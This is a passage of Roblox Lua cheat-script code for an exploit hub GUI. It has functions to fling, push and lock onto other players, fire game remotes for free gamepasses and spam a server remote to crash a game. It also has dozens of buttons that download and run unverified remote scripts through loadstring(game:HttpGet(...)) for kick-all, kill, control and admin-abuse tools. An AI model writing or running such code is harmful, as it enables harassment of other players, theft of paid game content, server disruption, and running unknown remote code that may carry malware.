OpenGUI.Parent = SideFrame OpenGUI.BackgroundColor3 = Color3.new(1, 1, 1) OpenGUI.BackgroundTransparency = 1 OpenGUI.Position = UDim2.new(0, 327, 0, 0) OpenGUI.Size = UDim2.new(0, 49, 0, 36) OpenGUI.Font = Enum.Font.SourceSans OpenGUI.FontSize = Enum.FontSize.Size60 OpenGUI.Text = "X" OpenGUI.TextSize = 50 SideCredit.Name = "SideCredit" SideCredit.Parent = SideFrame SideCredit.BackgroundColor3 = Color3.new(1, 1, 1) SideCredit.BackgroundTransparency = 1 SideCredit.Position = UDim2.new(0, 16, 0, 0) SideCredit.Size = UDim2.new(0, 96, 0, 36) SideCredit.Font = Enum.Font.Highway SideCredit.FontSize = Enum.FontSize.Size14 SideCredit.Text = "illremember" SideCredit.TextColor3 = Color3.new(0.431373, 0.662745, 0.709804) SideCredit.TextScaled = true SideCredit.TextSize = 14 SideCredit.TextStrokeColor3 = Color3.new(1, 1, 1) SideCredit.TextStrokeTransparency = 0 SideCredit.TextWrapped = true SideTitle.Name = "SideTitle" SideTitle.Parent = SideFrame SideTitle.BackgroundColor3 = Color3.new(1, 1, 1) SideTitle.BackgroundTransparency = 1 SideTitle.Size = UDim2.new(0, 376, 0, 36) SideTitle.Font = Enum.Font.Highway SideTitle.FontSize = Enum.FontSize.Size14 SideTitle.Text = "GlitchMax" SideTitle.TextColor3 = Color3.new(0.243137, 0.372549, 0.4) SideTitle.TextScaled = true SideTitle.TextSize = 14 SideTitle.TextStrokeColor3 = Color3.new(1, 1, 1) SideTitle.TextStrokeTransparency = 0 SideTitle.TextWrapped = true -- Buttons col = Color3.new(0.254902, 0.254902, 0.254902) loc = Color3.new(0.40, 0.40, 0.40) CloseGUI.MouseButton1Click:connect(function() MainFrame.Visible = false SideFrame.Visible = true SideFrame.Position = MainFrame.Position end) OpenGUI.MouseButton1Click:connect(function() MainFrame.Visible = true SideFrame.Visible = false MainFrame.Position = SideFrame.Position end) function shortnames(username) local nameshort = {} for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #username) == username:lower() then table.insert(nameshort,v) end end return nameshort end local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) flattening = false Flatten.MouseButton1Click:connect(function() flattening = not flattening if flattening then Flatten.BackgroundColor3 = loc local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Flatten" for i,v in pairs(shortnames(UserBox.Text))do y.Target = game:GetService("Players")[v.name].Character["Left Leg"] y:Fire() track:Play(.1, 1, 1) game:GetService('RunService').Stepped:connect(function() if flattening then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if flattening then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0,2,0) end end end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Flatten:Destroy() track:Stop() Flatten.BackgroundColor3 = col end end) floating = false Float.MouseButton1Click:connect(function() floating = not floating if floating then Float.BackgroundColor3 = loc local y = Instance.new("RocketPropulsion") y.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart y.CartoonFactor = 1 y.MaxThrust = 50000 y.MaxSpeed = 1000 y.ThrustP = 50000 y.Name = "Float" for i,v in pairs(shortnames(UserBox.Text))do y.Target = game:GetService("Players")[v.Name].Character.Head y:Fire() game:GetService('RunService').Stepped:connect(function() if floating then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if floating then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Leg"].CFrame end end end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Float:Destroy() Float.BackgroundColor3 = col end end) LockOnACTIVE = false LockOn.MouseButton1Click:connect(function() LockOnACTIVE = not LockOnACTIVE for i,v in pairs(shortnames(UserBox.Text))do while wait() do if LockOnACTIVE then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame LockOn.BackgroundColor3 = loc else LockOn.BackgroundColor3 = col end end end end) pushing = false Push.MouseButton1Click:connect(function() pushing = not pushing if pushing then Push.BackgroundColor3 = loc local b = Instance.new("RocketPropulsion") b.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart b.TurnP = 2500 b.MaxThrust = 50000 b.MaxSpeed = 1000 b.ThrustP = 50000 b.CartoonFactor = 1 b.Name = "Push" for i,v in pairs(shortnames(UserBox.Text))do b.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart b:Fire() game:GetService('RunService').Stepped:connect(function() if pushing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) b:Fire() end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Push:Destroy() Push.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) experi = false Experimental.MouseButton1Click:connect(function() experi = not experi if experi then Experimental.BackgroundColor3 = loc local h = Instance.new("RocketPropulsion") h.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart h.Name = "Experimental" for i,v in pairs(shortnames(UserBox.Text))do h.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart h:Fire() track:Play(.1,1,1) game:GetService('RunService').Stepped:connect(function() if experi then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Experimental:Destroy() track:Stop() Stick.BackgroundColor3 = col end end) stuck = false Stick.MouseButton1Click:connect(function() stuck = not stuck if stuck then Stick.BackgroundColor3 = loc local h = Instance.new("RocketPropulsion") h.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart h.MaxSpeed = 1000 h.MaxThrust = 10000 h.Name = "Stick" for i,v in pairs(shortnames(UserBox.Text))do h.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart h:Fire() game:GetService('RunService').Stepped:connect(function() if stuck then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Stick:Destroy() Stick.BackgroundColor3 = col end end) end) FEFloatinghead.Name = "FE Floating head" FEFloatinghead.Parent = MainBody FEFloatinghead.BackgroundColor3 = Color3.new(0, 0.615686, 1) FEFloatinghead.Position = UDim2.new(0.347598583, 0, 0.653591216, 0) FEFloatinghead.Size = UDim2.new(0, 106, 0, 27) FEFloatinghead.Font = Enum.Font.SciFi FEFloatinghead.Text = "FE FloatingHead" FEFloatinghead.TextColor3 = Color3.new(1, 1, 1) FEFloatinghead.TextSize = 14 FEFloatinghead.MouseButton1Down:connect(function() local speed = 50 -- This is the fly speed. Change it to whatever you like. The variable can be changed while running local c local h local bv local bav local cam local flying local p = game:GetService'Players'.LocalPlayer local buttons = {W = false, S = false, A = false, D = false, Moving = false} local startFly = function () -- Call this function to begin flying if not p.Character or not p.Character.Head or flying then return end c = p.Character h = c.Humanoid h.PlatformStand = true cam = game:GetService("Workspace"):WaitForChild('Camera') bv = Instance.new("BodyVelocity") bav = Instance.new("BodyAngularVelocity") bv.Velocity, bv.MaxForce, bv.P = Vector3.new(0, 0, 0), Vector3.new(10000, 10000, 10000), 1000 bav.AngularVelocity, bav.MaxTorque, bav.P = Vector3.new(0, 0, 0), Vector3.new(10000, 10000, 10000), 1000 bv.Parent = c.Head bav.Parent = c.Head flying = true h.Died:connect(function() flying = false end) end local endFly = function () -- Call this function to stop flying if not p.Character or not flying then return end h.PlatformStand = false bv:Destroy() bav:Destroy() flying = false end game:GetService("UserInputService").InputBegan:connect(function (input, GPE) if GPE then return end for i, e in pairs(buttons) do if i ~= "Moving" and input.KeyCode == Enum.KeyCode[i] then buttons[i] = true buttons.Moving = true end end end) game:GetService("UserInputService").InputEnded:connect(function (input, GPE) if GPE then return end local a = false for i, e in pairs(buttons) do if i ~= "Moving" then if input.KeyCode == Enum.KeyCode[i] then buttons[i] = false end if buttons[i] then a = true end end end buttons.Moving = a end) local setVec = function (vec) return vec * (speed / vec.Magnitude) end game:GetService("RunService").Heartbeat:connect(function (step) -- The actual fly function, called every frame if flying and c and c.PrimaryPart then local p = c.PrimaryPart.Position local cf = cam.CFrame local ax, ay, az = cf:toEulerAnglesXYZ() c:SetPrimaryPartCFrame(CFrame.new(p.x, p.y, p.z) * CFrame.Angles(ax, ay, az)) if buttons.Moving then local t = Vector3.new() if buttons.W then t = t + (setVec(cf.lookVector)) end if buttons.S then t = t - (setVec(cf.lookVector)) end if buttons.A then t = t - (setVec(cf.rightVector)) end if buttons.D then t = t + (setVec(cf.rightVector)) end c:TranslateBy(t * step) end end end) FEFloatinghead.MouseButton1Down:connect(function() local lol = game:GetService'Players'.LocalPlayer.Character pcall(function() for i,v in pairs(lol:GetChildren()) do if v.Name ~= 'Head' and v.Name ~= 'Torso' and v.Name ~= 'HumanoidRootPart' then v:Destroy() end end local ok = lol:FindFirstChild'Torso' if ok then ok = ok:FindFirstChild'roblox' if ok then ok:Destroy() end end Instance.new('Humanoid', lol) if lol.HumanoidRootPart:FindFirstChild'Rank' then lol.HumanoidRootPart:FindFirstChild'Rank':Destroy() end local nouxd = lol:FindFirstChild'Torso' wait'1' lol.Head.Position = lol.Head.Position + Vector3.new(1,1,1) if nouxd then nouxd.Transparency = 1 end wait'.3' startFly() end) end) end) Inform.Name = "Inform" Inform.Parent = MainBody Inform.BackgroundColor3 = Color3.new(0, 0.615686, 1) Inform.Position = UDim2.new(0.698873401, 0, 0.653591216, 0) Inform.Size = UDim2.new(0, 106, 0, 27) Inform.Font = Enum.Font.SciFi Inform.Text = "ChatLogs" Inform.TextColor3 = Color3.new(1, 1, 1) Inform.TextSize = 14 Inform.MouseButton1Down:connect(function() loadstring(game:GetObjects("rbxassetid://1295331911")[1].Source)() end) TextLabel_2.Parent = MainBody TextLabel_2.BackgroundColor3 = Color3.new(0, 0, 0) TextLabel_2.BorderSizePixel = 0 TextLabel_2.Position = UDim2.new(0, 0, 0.940740705, 0) TextLabel_2.Size = UDim2.new(0, 200, 0, 16) TextLabel_2.Font = Enum.Font.ArialBold TextLabel_2.Text = "Made by 1x7x9x0x3x1x9" TextLabel_2.TextColor3 = Color3.new(1, 1, 1) TextLabel_2.TextSize = 14 end }) GUIS:AddButton({ Title = "FE Universal Hub", Description = "idefk", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Dvrknvss/UniversalFEScriptHub/main/Script'))() end }) GUIS:AddButton({ Title = "Arosia FE GUI", Description = "Arosia FE GUI", Callback = function() loadstring(Game:GetObjects("rbxassetid://1255908305")[1].Source)() end }) GUIS:AddButton({ Title = "FE Scripts", Description = "hella shi", Callback = function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] --discord.gg/boronide, code generated using luamin.js™ local a=loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()local a=a.CreateLib("c00lman/colkidclone hax panel","Ocean")local b=a:NewTab("Credits/Info")local c=b:NewSection("Made By C00LMAN Scripts made by")local c=b:NewSection("Harked Options : PandaExploits#3098")local c=b:NewSection("Destructed_Hex's GUI Scripts : Luca and luq")local b=b:NewSection("quirkyCMD adm : ____")local b=a:NewTab("GUIS ABUSIVE")local b=b:NewSection("Scripts For Hacking")b:NewButton("Harked V2","Harked With Kick Kill Ban Blockhead BlockChar ETC",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/JxcExploit/Harkedv2-script/main/Leaked-v2hardked"))()end)b:NewButton("Destruction_Hex's GUI","Harked But With more options like Shutodwn Nuke ETC",function()loadstring(game:HttpGet("https://pastebin.com/raw/S28p8fN9"))()end)b:NewButton("QuirkyCmd","The Best ADM Script",function()loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))()end)b:NewButton("Bring GUI","a simple bring script",function()loadstring(game:HttpGet(('https://pastebin.com/raw/iThJgCAS'),true))()end)b:NewButton("Nameless Admin","Universal GOOD Admin Script",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source"))()end)b:NewButton("Infinite Yeld Admin","OLD AND GOOD ADMIN",function()loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()end)b:NewButton("R15 TO R6","Animations r15 to animations r6",function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/Imagnir/r6_anims_for_r15/main/r6_anims.lua'),true))()end)b:NewButton("Parkour","heh",function()loadstring(game:HttpGet(('https://pastefy.app/6HAb8rAj/raw'),true))()end)b:NewButton("Punch","PUNCH THE GUY U HATE",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/fedoratums/Base-Script/Base-Script/fedoratum punch fling",true))()end)b:NewButton("(cook burgers 100ppl only) Cooked","Harked Vcooked",function()loadstring(game:HttpGet("https://pastebin.com/raw/LMWCkgnm"))()end)b:NewButton("Cook Burgers GUI","T",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/NOOBARMYSCRIPTER/NOOBARMYSCRIPTER/main/cook%20burgers"))()end)b:NewButton("GIGACHAD HUB","(gigachad very giga warning)",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/OWJBWKQLAISH/GigaChad-Hub/main/Protected_3038811338432694.lua.txt"))()end)b:NewButton("Invisible","bye bye",function()loadstring(game:HttpGet("https://pastebin.com/raw/K0khSQFN"))()end)b:NewButton("Animation PACK","/e pack frfrfrfr",function()loadstring(game:HttpGet("https://pastebin.com/raw/tcTds0ky"))()end)b:NewButton("B2S ADM GUI","adm btools and much move to troll (also have kick)",function()loadstring(game:HttpGet("https://pastebin.com/raw/jEUmUnQC"))()end)b:NewButton("tool rotator","rerereeeeeeeeeeeeeeeeeeeeeeeeeeee",function()loadstring(game:HttpGet(('https://pastebin.com/raw/dkufMsdA'),true))()end)b:NewButton("Game Hub V5","lots of fun",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/GamerScripter/Game-Hub/main/loader"))()end)b:NewButton("AUDIO BREAKER","dont work all games",function()loadstring(game:HttpGet("https://pastebin.com/raw/JmQMG0ct"))()end)b:NewButton("Destruction Game Destroyer","dont work all games",function()everyClipboard("https://www.roblox.com/games/6550894018/Destruction-Game")game:GetService("StarterGui"):SetCore("SendNotification",{Title="GAME",Text="only work in the game copyied in clipboard",Icon="rbxassetid://1234567890"})loadstring(game:HttpGet("https://raw.githubusercontent.com/Bac0nHck/Scripts/main/Destruction%20Game"))()end)b:NewButton("Free gamepass","l robux",function()loadstring(game:HttpGet("https://gist.githubusercontent.com/dark-modz/6982de484735e730494b2d5a10fd6a2a/raw/a92563b0cd6a63683341a09f54baccea5349ed69/feGamepassV2",true))()end)b:NewButton("unchor gui","hehehhe",function()loadstring(game:HttpGet("https://pastebin.com/raw/ShnqV5Vr",true))()end)local b=a:NewTab("F3X GAMES")local b=b:NewSection("Scripts For Hacking")b:NewButton("Exploit1.Form.Exe","hax ss fe bypass fe disabler fe joifb",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/fggdfgbdrtgbdrt/Exploit1.Form.Exe/main/Exploit1.Form.Exe"))()end)b:NewButton("c00lkidd f3x","f3x destruction",function()loadstring(game:HttpGet("https://pastebin.com/raw/Dyh2BUeu"))()end)local b=a:NewTab("FE SCRIPTS")local c=b:NewSection("Fun")c:NewButton("Chat Art","art can bypass chat also btw",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/omegachadgaming/mongus/main/main.lua",true))()end)c:NewButton("Multi Gears","GEAR CHAOS",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/MultiToolsV1/main/script"))()end)c:NewButton("FREE OBBY GAMEPASS","-1 everytime u execute robux",function()for a,a in pairs(game:GetDescendants())do if a.ClassName=="RemoteEvent"then if a.Parent.Name=="WeaponsRemotes"or a.Parent.Name=="VipRemotes"or a.Parent.Name=="Remotes"then a:FireServer()end end end end)c:NewButton("Walk On Walls","spiodermanse",function()loadstring(game:HttpGet("https://pastebin.com/raw/zXk4Rq2r"))()end)c:NewTextBox("flood escape crasher (crash ammount)","crash game",function(a)game:GetService("StarterGui"):SetCore("SendNotification",{Title="HOW TO DO IT",Text="1st grab gun and the switch the crash trigger... enjoy :D",Icon="rbxassetid://1234567890"})game:GetService("StarterGui"):SetCore("SendNotification",{Title="CREDITS",Text="https://scriptblox.com/u/Tomato",Icon="rbxassetid://1234567890"})game:GetService("StarterGui"):SetCore("SendNotification",{Title="CREDITS",Text="https://scriptblox.com/u/Tomato",Icon="rbxassetid://1234567890"})local a=a;local b=game:GetService("RunService")local b=game:GetService("Players").LocalPlayer.Character;local c=game:GetService("Players").LocalPlayer.Backpack;local d=loadstring(game:HttpGet("https://pastebin.com/raw/eKwyeQa0",true))()local e=d:CreateTab("Crash Script",true)getgenv().crash=false;game:GetService("Workspace").svcl_com.ShopExtra:FireServer("BRAINSAW")local d=d:MakeToggle(e,"Crash Toggle",false,function(a)local a=a.Text;if a=="ON"then crash=true else crash=false end end)local c=c:WaitForChild("BRAINSAW").Pew;while wait()do if crash==true then local b=b.Head.Position;for a=1,a,1 do c:FireServer(b)end end end end)c:NewButton("HD ADMIN ABUSIVE","admen",function()game:GetService("StarterGui"):SetCore("SendNotification",{Title="pls",Text="for more cmds say ;customcmds",Icon="rbxassetid://1234567890"})loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/showcases/main/fedoratumadmin",true))()end)c:NewButton("PART UNACHORED MOVER","/e move",function()loadstring(game:HttpGet(('https://pastefy.app/Vcuyg09O/raw'),true))()end)c:NewButton("ZOMBIE FLING","",function()loadstring(game:HttpGet(('https://pastefy.app/w7KnPY70/raw'),true))()end)c:NewButton("control npcs","",function()loadstring(game:HttpGet(('https://pastefy.app/x8nWWq0M/raw'),true))()end)local b=b:NewSection("work at a pizza place")b:NewButton("COOK ROOM DUCKER","room dies",function()loadstring(game:HttpGet("https://pastebin.com/raw/PMCUVLj0"))()end)b:NewButton("COOK ROOM DUCKER OFF","room dies",function()loadstring(game:HttpGet("https://pastebin.com/raw/pFFf3Tcf"))()end)b:NewButton("GUI WAAP","room dies",function()loadstring(game:HttpGet("https://pastebin.com/raw/7Q5sN2wY",true))()end)b:NewButton("AUDIO PLAYER FE","room dies",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/pizza-place-audio-player/main/script"))()end)b:NewButton("MANAGER COMMAND","room dies",function()spawn(loadstring(game:HttpGet("https://pastebin.com/raw/q817HYb9",true)))end)b:NewButton("KICK ALL","room dies",function()loadstring(game:HttpGet('https://raw.githubusercontent.com/Hydro4Music/Others/main/WorkAtPizzaPlaceKickAll'))()end)local b=a:NewTab("Brookhaven Rp 🏡")local b=b:NewSection("Scripts For Hacking")b:NewButton("R15 TO R6","Animations r15 to animations r6",function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/Imagnir/r6_anims_for_r15/main/r6_anims.lua'),true))()end)b:NewButton("Redz Hub","hub",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/REDzHUB/main/REDzHUB"))()end)b:NewButton("Ice Hub","hub",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/IceMael7/NewIceHub/main/Brookhaven"))()end)b:NewButton("tb","tttt",function()loadstring(game:HttpGet("https://pastefy.app/tIiioko4/raw"))()end)local b=a:NewTab("Fake Executors")local b=b:NewSection("Executors")b:NewButton("RC7","EXPLOIT",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/rc7"))()end)b:NewButton("Krnl","EXPLOIT",function()loadstring(game:HttpGet("https://raw.githubusercontent.com/wtfplayer/redemption/main/krnlnoui.lua"))()end)b:NewButton("Synapse X","EXNOTPLOIT",function()loadstring(game:HttpGet("https://pastebin.com/raw/2qjBZB1Y"))()end)local b=a:NewTab("Barrys Prison")local c=b:NewSection("Morphs (execute gamepass)")c:NewButton("Free Gamepass","free gamepass gears",function()for a,a in pairs(game:GetDescendants())do if a.ClassName=="RemoteEvent"then if a.Parent.Name=="WeaponsRemotes"or a.Parent.Name=="VipRemotes"or a.Parent.Name=="Remotes"then a:FireServer()end end end end)c:NewButton("Become Barrys","BRRYS NOT BARRYS",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(164.482285,107.406891,-20.2540112,-0.392119616,-4.18371542e-08,-0.919914246,-5.41307841e-12,1,-4.54770976e-08,0.919914246,-1.78274835e-08,-0.392119616)end)c:NewButton("Become Pizza Guy (not mario)","pizza",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(95.4371109,104.737022,-20.1365261,0.999057412,4.13396783e-09,-0.0434087291,-3.30724857e-12,1,9.51574464e-08,0.0434087291,-9.50676053e-08,0.999057412)end)c:NewButton("Become Police But a Doll Ugly","ugly",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(108.916046,106.567535,-18.5824261,-0.979165018,3.85838117e-09,0.203066275,3.97604172e-09,1,1.71468756e-10,-0.203066275,9.75296177e-10,-0.979165018)end)c:NewButton("Become Funni Ugly Doll","ugly",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(136.070724,107.01152,-20.4083557,-0.103358306,-8.48401849e-10,-0.994644165,3.80977194e-10,1,-8.92559415e-10,0.994644165,-4.71190198e-10,-0.103358306)end)c:NewButton("Enable Jump","Enable Jumps for morphs",function()game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower=50 end)local b=b:NewSection("Tps")b:NewButton("Prision tp","/etp",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(-2.19999719,103.197998,-43.3999939,1,0,0,0,1,0,0,0,1)end)b:NewButton("lvl 4 tp","Ye",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(-25.8886013,103.197998,-76.470108,0.999480724,2.88266513e-08,0.0322222672,-3.04456904e-08,1,4.97553536e-08,-0.0322222672,-5.07105469e-08,0.999480724)end)b:NewButton("Gamepass Place","Ye",function()game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(105.225609,103.19799,-69.9990387,-0.998112321,4.39675052e-09,0.0614152141,3.23092197e-09,1,-1.90820373e-08,-0.0614152141,-1.88475884e-08,-0.998112321)end)local a=a:NewTab("Animations")local a=a:NewSection("🥚")a:NewButton("2007 animations","OLD ANIMATIONS",function()loadstring(game:HttpGet("https://pastebin.com/raw/SPfYLTyK"))()end)a:NewButton("custom sit animation",";sit",function()loadstring(game:HttpGet("https://pastefy.app/XKxQtK2K/raw"))()end)a:NewButton("Upsidedown","/e flip",function()game:GetService("StarterGui"):SetCore("SendNotification",{Title="Upside Down Note :";Text="You Cant See This Script But Other Players In Server Can.";Icon=""})Duration=5;loadstring(game:HttpGet("https://raw.githubusercontent.com/HeyGyt/upsidedown/main/main"))()end) end }) GUIS:AddButton({ Title = "Harked?", Description = "some fork of hark or sum idfk", Callback = function() --[[ // Made for this game: https://www.roblox.com/games/5409315202 // This uses chat commands e.g ".control Whoo129" // Most things I couldn't be asked to do // Made fully by Whoogivesashit#2751 // Chat commands still work ]] print([[ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ///////////////////////////////////////////////////Gerbils//////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ // Commands: -- (Chat commands still work!) .clear | Clears every item .fling (Plr) | Fling a player .rocket (Plr) | Make a player goto the moon .bring (Plr) | Bring a player .kill (Plr) | Kill a player .spin (Plr) | Make a player spin (Can do ".unspin") .control (Plr) | Control a player (May have to rejoin to stop) .money | Pickup all the droped cash .speed (Plr) | Make a player speedy .jump (Plr) | Change a player's jump hight .freeze (Plr) | Freeze a player (Can do ".unfreeze") .tpvan | Bring the delivery truck to you .netclaim | Claim the net back if there is a abuser .fix | Refresh the server .slave (Plr) | Make a player follow you until they get to you .jail (Plr) | Lock a player until they reset \\ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ]]) -- Gui to Lua -- Version: 3.2 -- Instances: local main = Instance.new("ScreenGui") local Main = Instance.new("Frame") local credits = Instance.new("TextLabel") local queue = Instance.new("TextLabel") local Frame = Instance.new("Frame") local top = Instance.new("TextLabel") local UIGradient = Instance.new("UIGradient") local ScrollingFrame = Instance.new("ScrollingFrame") local Bring = Instance.new("TextButton") local UICorner = Instance.new("UICorner") local Control = Instance.new("TextButton") local UICorner_2 = Instance.new("UICorner") local Fling = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local Unfreeze = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") local Rocket = Instance.new("TextButton") local UICorner_5 = Instance.new("UICorner") local Spin = Instance.new("TextButton") local UICorner_6 = Instance.new("UICorner") local freeze = Instance.new("TextButton") local UICorner_7 = Instance.new("UICorner") local Kill = Instance.new("TextButton") local UICorner_8 = Instance.new("UICorner") local Speed = Instance.new("TextButton") local UICorner_9 = Instance.new("UICorner") local Jump = Instance.new("TextButton") local UICorner_10 = Instance.new("UICorner") local Slave = Instance.new("TextButton") local UICorner_11 = Instance.new("UICorner") local Jail = Instance.new("TextButton") local UICorner_12 = Instance.new("UICorner") local UIGridLayout = Instance.new("UIGridLayout") local Fix = Instance.new("TextButton") local UICorner_13 = Instance.new("UICorner") local NetClaim = Instance.new("TextButton") local UICorner_14 = Instance.new("UICorner") local Tpvan = Instance.new("TextButton") local UICorner_15 = Instance.new("UICorner") local Money = Instance.new("TextButton") local UICorner_16 = Instance.new("UICorner") local NoCLip = Instance.new("TextButton") local UICorner_17 = Instance.new("UICorner") local Clear = Instance.new("TextButton") local UICorner_18 = Instance.new("UICorner") local Orbit = Instance.new("TextButton") local UICorner_19 = Instance.new("UICorner") local Goto = Instance.new("TextButton") local UICorner_20 = Instance.new("UICorner") local target = Instance.new("TextBox") local UICorner_21 = Instance.new("UICorner") local UIGradient_2 = Instance.new("UIGradient") local Refresh = Instance.new("TextButton") local UICorner_22 = Instance.new("UICorner") local search = Instance.new("TextBox") local UICorner_23 = Instance.new("UICorner") --Properties: main.Name = "main" main.Parent = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") main.ResetOnSpawn = false Main.Name = "Main" Main.Parent = main Main.BackgroundColor3 = Color3.fromRGB(47, 46, 25) Main.BackgroundTransparency = 0.300 Main.BorderColor3 = Color3.fromRGB(29, 29, 29) Main.BorderSizePixel = 6 Main.Position = UDim2.new(0.662217021, 0, 0.189768493, 0) Main.Size = UDim2.new(0, 292, 0, 432) Main.ZIndex = 0 credits.Name = "credits" credits.Parent = Main credits.BackgroundColor3 = Color3.fromRGB(255, 255, 255) credits.BackgroundTransparency = 1.000 credits.Position = UDim2.new(0.00341296918, 0, 0.100263849, 0) credits.Size = UDim2.new(0, 291, 0, 31) 